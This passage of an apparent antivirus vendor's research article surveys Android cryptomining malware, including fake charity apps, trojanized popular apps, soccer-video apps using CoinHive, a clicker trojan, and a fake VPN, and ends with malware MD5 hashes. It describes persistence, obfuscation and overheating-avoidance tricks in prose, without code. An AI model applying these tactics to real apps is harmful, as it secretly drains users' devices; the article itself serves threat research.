One more app caught our eye — Crypto Mining for Children. Based on the B4A framework, it was found in the official Google store (at the time of writing this article it had been deleted). Its stated goal was to mine cryptocurrency for charity. But the description contained no word about where or how the coins would be spent — something that any bona fide fundraising organization would publish. What’s more, the name of the developer bore a striking resemblance to that of a well-known mobile app (a cryptocurrency wallet), but with one letter missing. That’s a common trick used by phishers.

Useful apps infected with miners
This category is made of programs that Kaspersky Lab products detect as Trojan.AndroidOS.Coinge; they are popular apps in which cybercriminals have added malicious code for mining cryptocurrency.

Infected version of the TSF Launcher app

Interestingly, the cybercriminals added the malicious code to the code of other SDKs used by the app. That way, the app runs a library that does the mining. Not only that, we managed to detect a modification of this Trojan that does away with the need for a library: the malware adds its code to all web pages it opens. It’s worth noting that both methods of infection are similar to those used by Trojan-PSW.AndroidOS.MyVk to steal passwords.

A modification of Trojan.AndroidOS.Coinge adds mining code to all opened web pages

We managed to detect 23 different apps infected by Trojan.AndroidOS.Coinge.

Miners in apps for watching soccer
According to Kaspersky Security Network, the most common mining apps among those we found were connected to the topic of soccer. The name PlacarTV (placar means “account” in Portuguese) or something similar cropped up frequently. The main function of such apps was to show soccer videos while secretly mining cryptocurrency.

The PlacarTV app uses CoinHive for mining

The PlacarTV app interface

Our data shows that some of these apps were distributed through Google Play, with the most popular having been installed more than 100,000 times.

A modification of the PlacarTV app that was distributed through Google Play

The apps access the placartv.com server. This same domain is used in the developer’s email address specified in the Google Play store. Unbeknown to visitors, the site placartv.com runs a script that mines cryptocurrency.

Code of the placartv.com page used to mine cryptocurrency

Mobile clickers
Members of the Trojan.Clicker malware family typically open web pages and click them without the user noticing. Such pages can contain both adverts and subscriptions to WAP services. But having started to make easy money from unsuspecting users, the creators seemingly got greedy. And it wasn’t long before cryptocurrency mining was added to the feature set of some clickers. We already analyzed a similar case when a miner was caught lurking in the modules of the Loapi Trojan.

Another Trojan-turned-miner is Ubsob. This malware poses as a suite of useful apps. When started, it downloads and installs an app that it uses to mask itself. Its creators broadened their horizons by adding code borrowed from the app NeoNeonMiner for cryptomining.

Installation of the original app initialized by the Ubsob Trojan

Furthermore, the Trojan requests device administrator rights to establish a foothold in the system. This means that to delete it, it must first be removed from the list of device administrators. During the process, the malware displays a scary message – “These action can lead to data lost. Are you really wont to erase all your data?”

Message displayed by the Ubsob Trojan when attempting to deprive it of administrator rights

The Trojan mainly “resides” in CIS countries, above all Russia.

Other interesting finds
Fire-prevention miner
Probably the most interesting Trojan we analyzed is Trojan.AndroidOS.Coinge.j. It has no legitimate app functions at all and installs itself either as a porn app or as an Android system app. As soon as it starts, the malware requests device administrator rights to prevent its removal.

Trojan.AndroidOS.Coinge.j requests device administrator rights

The Trojan uses several layers of encryption and obfuscation to protect its code from analysis, but that’s not the only string to its bow. The malware monitors the device battery and temperature to mine cryptocurrency without posing a fire hazard. It seems the cybercriminals have no desire to repeat the “success” of Loapi, which incinerated our test phone.

Almost a third (29%) of the Trojan’s victims were in India. It is also active in the United States (8%), Britain (6%), Iran (5%), and Ukraine (5%). Like Ubsod, it uses the code of a legitimate app to mine cryptocurrencies.

VPN with undocumented features
We found another battery and temperature-monitoring miner in Google Play under the guise of the Vilny.net VPN app for establishing a VPN connection. By the time of detection, it had been installed more than 50,000 times. We reported it to Google.

Code of the Vilny.net VPN app

Information about the Vilny.net VPN app on Google Play

Conclusion
Keep in mind that mobile mining has a number of limitations:

First, mobile devices trail a long way behind desktop systems performance-wise, let alone dedicated mining farms, which eats into the profitability of cryptocurrency mining on mobile devices.
Second, heavy use of mobile devices causes them to heat up noticeably, alerting the user.
Lastly, smartphones’ relatively small battery power means they discharge quickly if used intensively, making mining more visible to the user and time-limited.
However, our study showed that cybercriminals are not put off by these limitations. We uncovered numerous mobile miners built on various frameworks and distributed in various ways, including through the official Google Play store. Perhaps cybercriminals are banking on compensating for smartphones’ poor performance and mobile miners’ easy detection through the sheer number of handheld devices out there and their high infectibility.

MD5
F9C4A28284CD7A4534A1102C20F04C9D
B32DBBFBB0D4EC97C59B50D29DDAAA2D
2D846265F6569547490FCB38970FC93E
6E1FDFBDAB69090FEA77B3F2F33098A8
5464647B09D5F2E064183A073AE97D7B
5B7324C165EE6AF26CDA55293DAEACDF
E771099ACA570F53A94BE713A3C2ED63
3062659C25F44EEA5FE8D3D85C99907D
AEBB87E9AEA464EFB6FCC550BF7D2D38
38CE6C161F87345B773795553AAE2C28
CA3E7A442D5A316DA9ED8DB3C4D913A7
34F43BAAFAEBDAC4CC582E1AAACF26BD
F8DE7065A7D9F191FD0A53289CDB959B
34EB1FFDC8D9D5DD3C32A0ACC4995E29
020A9064D3819A0293940A4F0B36DD2A
EE78507A293D007C47F3D2D471AAD013
0E129E2F4EA3C09BFB0C4841E173580C
50BF20954B8388FA3D5E048E6FA493A9